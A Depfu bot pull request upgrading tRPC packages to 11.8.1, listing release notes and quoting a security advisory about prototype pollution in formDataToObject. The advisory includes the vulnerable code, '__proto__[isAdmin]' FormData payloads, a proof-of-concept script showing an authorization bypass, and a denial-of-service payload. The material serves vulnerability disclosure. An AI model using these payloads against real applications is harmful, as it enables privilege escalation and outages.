Skip to content

🚨 [security] Update all of trpc 11.4.3 → 11.8.1 (minor) #668

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
depfu wants to merge 1 commit into
base: main
Choose a base branch
from
Open

🚨 [security] Update all of trpc 11.4.3 → 11.8.1 (minor) #668

depfu wants to merge 1 commit into from

Conversation

@depfu
Copy link

@depfu depfu bot commented Dec 22, 2025

Welcome to Depfu 👋

This is one of the first three pull requests with dependency updates we've sent your way. We tried to start with a few easy patch-level updates. Hopefully your tests will pass and you can merge this pull request without too much risk. This should give you an idea how Depfu works in general.

After you merge your first pull request, we'll send you a few more. We'll never open more than seven PRs at the same time so you're not getting overwhelmed with updates.

Let us know if you have any questions. Thanks so much for giving Depfu a try!

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ @​trpc/client (11.4.3 → 11.8.1) · Repo

Release Notes

11.8.1

What's Changed

  • fix(server): pass maxDurationMs timeout signal to subscription handlers by @tt-a1i in #7037
  • fix(tanstack-react-query): useSubscription prop tracking by @Julusian in #7036
  • fix(server): fastify form-data type by @wszgrcy in #6974

New Contributors

Full Changelog: v11.8.0...v11.8.1

11.8.0

What's Changed

  • feat(server): support streaming in API Gateway REST API by @anatolzak in #7039

11.7.2

What's Changed

  • fix(server): missing sse options when using mergeRouter by @timcole in #7023

New Contributors

Full Changelog: v11.7.1...v11.7.2

11.7.1

What's Changed

New Contributors

Full Changelog: v11.7.0...v11.7.1

11.7.0

What's Changed

  • fix(client): do not emit "connecting" when initializing websocket subscription by @hmatthieu in #6970
  • fix(server): Export octet types by @Nick-Lucas in #6981
  • feat(tanstack-react-query): Add QueryKey and MutationKey Prefix option by @Nick-Lucas in #6976

Full Changelog: v11.6.0...v11.7.0

11.6.0

What's Changed

  • feat: add precondition required response code by @y-nk in #6954
  • fix(client): httpBatchStreamLink in React Native "stream ends with TypeError" by @KATT in #6960

New Contributors

Full Changelog: v11.5.1...v11.6.0

11.5.1

What's Changed

New Contributors

Full Changelog: v11.5.0...v11.5.1

11.5.0

What's Changed

  • patch: prefer Standard Schema for input/output type inference by @dzhu in #6888
  • feat(server): expose procedure path in resolver options by @KATT in #6902

New Contributors

Full Changelog: v11.4.4...v11.5.0

11.4.4

What's Changed

  • patch: typescript 5.9 support by @KATT in #6877
  • fix(client): httpBatchLink with custom transformed object at top level by @KATT in #6878
  • fix: incompatible types in monorepo due to separate .d.ts for esm/cjs by @KATT in #6879

New Contributors

Full Changelog: v11.4.3...v11.4.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

✳️ @​trpc/react-query (11.4.3 → 11.8.1) · Repo

Release Notes

11.8.1

What's Changed

  • fix(server): pass maxDurationMs timeout signal to subscription handlers by @tt-a1i in #7037
  • fix(tanstack-react-query): useSubscription prop tracking by @Julusian in #7036
  • fix(server): fastify form-data type by @wszgrcy in #6974

New Contributors

Full Changelog: v11.8.0...v11.8.1

11.8.0

What's Changed

  • feat(server): support streaming in API Gateway REST API by @anatolzak in #7039

11.7.2

What's Changed

  • fix(server): missing sse options when using mergeRouter by @timcole in #7023

New Contributors

Full Changelog: v11.7.1...v11.7.2

11.7.1

What's Changed

New Contributors

Full Changelog: v11.7.0...v11.7.1

11.7.0

What's Changed

  • fix(client): do not emit "connecting" when initializing websocket subscription by @hmatthieu in #6970
  • fix(server): Export octet types by @Nick-Lucas in #6981
  • feat(tanstack-react-query): Add QueryKey and MutationKey Prefix option by @Nick-Lucas in #6976

Full Changelog: v11.6.0...v11.7.0

11.6.0

What's Changed

  • feat: add precondition required response code by @y-nk in #6954
  • fix(client): httpBatchStreamLink in React Native "stream ends with TypeError" by @KATT in #6960

New Contributors

Full Changelog: v11.5.1...v11.6.0

11.5.1

What's Changed

New Contributors

Full Changelog: v11.5.0...v11.5.1

11.5.0

What's Changed

  • patch: prefer Standard Schema for input/output type inference by @dzhu in #6888
  • feat(server): expose procedure path in resolver options by @KATT in #6902

New Contributors

Full Changelog: v11.4.4...v11.5.0

11.4.4

What's Changed

  • patch: typescript 5.9 support by @KATT in #6877
  • fix(client): httpBatchLink with custom transformed object at top level by @KATT in #6878
  • fix: incompatible types in monorepo due to separate .d.ts for esm/cjs by @KATT in #6879

New Contributors

Full Changelog: v11.4.3...v11.4.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

✳️ @​trpc/server (11.4.3 → 11.8.1) · Repo

Security Advisories 🚨

🚨 tRPC has possible prototype pollution in `experimental_nextAppDirCaller`

Note that this vulnerability is only present when using experimental_caller / experimental_nextAppDirCaller.

Summary

A Prototype Pollution vulnerability exists in @trpc/server's formDataToObject function, which is used by the Next.js App Router adapter. An attacker can pollute Object.prototype by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.

Affected Versions

  • Package: @trpc/server
  • Affected Versions: >=10.27.0
  • Vulnerable Component: formDataToObject() in src/unstable-core-do-not-import/http/formDataToObject.ts

Vulnerability Details

Root Cause

The set() function in formDataToObject.ts recursively processes FormData field names containing bracket/dot notation (e.g., user[name], user.address.city) to create nested objects. However, it does not validate or sanitize dangerous keys like __proto__, constructor, or prototype.

Vulnerable Code

// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts
function set(obj, path, value) {
  if (path.length > 1) {
    const newPath = [...path];
    const key = newPath.shift();  // ← No validation of dangerous keys
    const nextKey = newPath[0];

<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-c1">!</span><span class="pl-s1">obj</span><span class="pl-kos">[</span><span class="pl-s1">key</span><span class="pl-kos">]</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>  <span class="pl-c">// ← Accesses obj["__proto__"] which returns Object.prototype</span>
  <span class="pl-s1">obj</span><span class="pl-kos">[</span><span class="pl-s1">key</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-en">isNumberString</span><span class="pl-kos">(</span><span class="pl-s1">nextKey</span><span class="pl-kos">)</span> ? <span class="pl-kos">[</span><span class="pl-kos">]</span> : <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span>

<span class="pl-en">set</span><span class="pl-kos">(</span><span class="pl-s1">obj</span><span class="pl-kos">[</span><span class="pl-s1">key</span><span class="pl-kos">]</span><span class="pl-kos">,</span> <span class="pl-s1">newPath</span><span class="pl-kos">,</span> <span class="pl-s1">value</span><span class="pl-kos">)</span><span class="pl-kos">;</span>  <span class="pl-c">// ← Recursively pollutes Object.prototype</span>
<span class="pl-k">return</span><span class="pl-kos">;</span>



}

// ...

}


export function formDataToObject(formData) {

const obj = {};

for (const [key, value] of formData.entries()) {

const parts = key.split(/[.[]]/).filter(Boolean);  // Splits "proto[isAdmin]" → ["proto", "isAdmin"]

set(obj, parts, value);

}

return obj;

}

Attack Vector

When a user submits a form to a tRPC mutation using Next.js Server Actions, the nextAppDirCaller adapter processes the FormData:

// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89
if (normalizeFormData && input instanceof FormData) {
  input = formDataToObject(input);  // ← Vulnerable call
}

An attacker can craft FormData with malicious field names:

const formData = new FormData();
formData.append("__proto__[isAdmin]", "true");
formData.append("__proto__[role]", "superadmin");

When processed, this pollutes Object.prototype:

{}.isAdmin        // → "true"
{}.role           // → "superadmin"

Proof of Concept

# Step 1: Create the project directory

mkdir trpc-vuln-poc

cd trpc-vuln-poc


# Step 2: Initialize npm


npm init -y


# Step 3: Install vulnerable tRPC


npm install @trpc/[email protected]


# Step 4: Create the test file

Test.js

const { formDataToObject } = require('@trpc/server/unstable-core-do-not-import');

console.log("=== PoC Prototype Pollution en tRPC ===\n");


console.log("[1] Estado inicial:");

console.log("    {}.isAdmin =", {}.isAdmin);


const fd = new FormData();

fd.append("proto[isAdmin]", "true");

fd.append("proto[role]", "superadmin");

fd.append("username", "attacker");


console.log("\n[2] FormData malicioso:");

console.log('    proto[isAdmin] = "true"');

console.log('    proto[role] = "superadmin"');


console.log("\n[3] Llamando formDataToObject()...");

const result = formDataToObject(fd);

console.log("    Resultado:", JSON.stringify(result));


console.log("\n[4] Después del ataque:");

console.log("    {}.isAdmin =", {}.isAdmin);

console.log("    {}.role =", {}.role);


const user = { id: 1, name: "john" };

console.log("\n[5] Impacto en autorización:");

console.log("    Usuario normal:", JSON.stringify(user));

console.log("    user.isAdmin =", user.isAdmin);


if (user.isAdmin) {

console.log("\n    VULNERABLE - Authorization bypass exitoso!");

} else {

console.log("\n    ✓ Seguro");

}

Impact

Authorization Bypass (HIGH)

Many applications check user permissions using property access:

// Vulnerable pattern
if (user.isAdmin) {
  // Grant admin access
}

After pollution, all objects will have isAdmin: "true", bypassing authorization.

Denial of Service (MEDIUM)

Polluting commonly used property names can crash applications:

formData.append("__proto__[toString]", "not_a_function");
// All subsequent .toString() calls will fail
Release Notes

11.8.1

What's Changed

  • fix(server): pass maxDurationMs timeout signal to subscription handlers by @tt-a1i in #7037
  • fix(tanstack-react-query): useSubscription prop tracking by @Julusian in #7036
  • fix(server): fastify form-data type by @wszgrcy in #6974

New Contributors

Full Changelog: v11.8.0...v11.8.1

11.8.0

What's Changed

  • feat(server): support streaming in API Gateway REST API by @anatolzak in #7039

11.7.2

What's Changed

  • fix(server): missing sse options when using mergeRouter by @timcole in #7023

New Contributors

Full Changelog: v11.7.1...v11.7.2

11.7.1

What's Changed

New Contributors

Full Changelog: v11.7.0...v11.7.1

11.7.0

What's Changed

  • fix(client): do not emit "connecting" when initializing websocket subscription by @hmatthieu in #6970
  • fix(server): Export octet types by @Nick-Lucas in #6981
  • feat(tanstack-react-query): Add QueryKey and MutationKey Prefix option by @Nick-Lucas in #6976

Full Changelog: v11.6.0...v11.7.0

11.6.0

What's Changed

  • feat: add precondition required response code by @y-nk in #6954
  • fix(client): httpBatchStreamLink in React Native "stream ends with TypeError" by @KATT in #6960

New Contributors

Full Changelog: v11.5.1...v11.6.0

11.5.1

What's Changed

New Contributors

Full Changelog: v11.5.0...v11.5.1

11.5.0

What's Changed

  • patch: prefer Standard Schema for input/output type inference by @dzhu in #6888
  • feat(server): expose procedure path in resolver options by @KATT in #6902

New Contributors

Full Changelog: v11.4.4...v11.5.0

11.4.4

What's Changed

  • patch: typescript 5.9 support by @KATT in #6877
  • fix(client): httpBatchLink with custom transformed object at top level by @KATT in #6878
  • fix: incompatible types in monorepo due to separate .d.ts for esm/cjs by @KATT in #6879

New Contributors

Full Changelog: v11.4.3...v11.4.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@​depfu rebase
Rebases against your default branch and redoes this update
@​depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@​depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@​depfu cancel merge
Cancels automatic merging of this PR
@​depfu close
Closes this PR and deletes the branch
@​depfu reopen
Restores the branch and reopens this PR (if it's closed)
@​depfu pause
Ignores all future updates for this dependency and closes this PR
@​depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@​depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)

@depfu depfu bot added the depfu label Dec 22, 2025
@sonarqubecloud
Copy link

sonarqubecloud bot commented Dec 22, 2025

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

@depfu depfu bot mentioned this pull request Dec 22, 2025
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

depfu

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant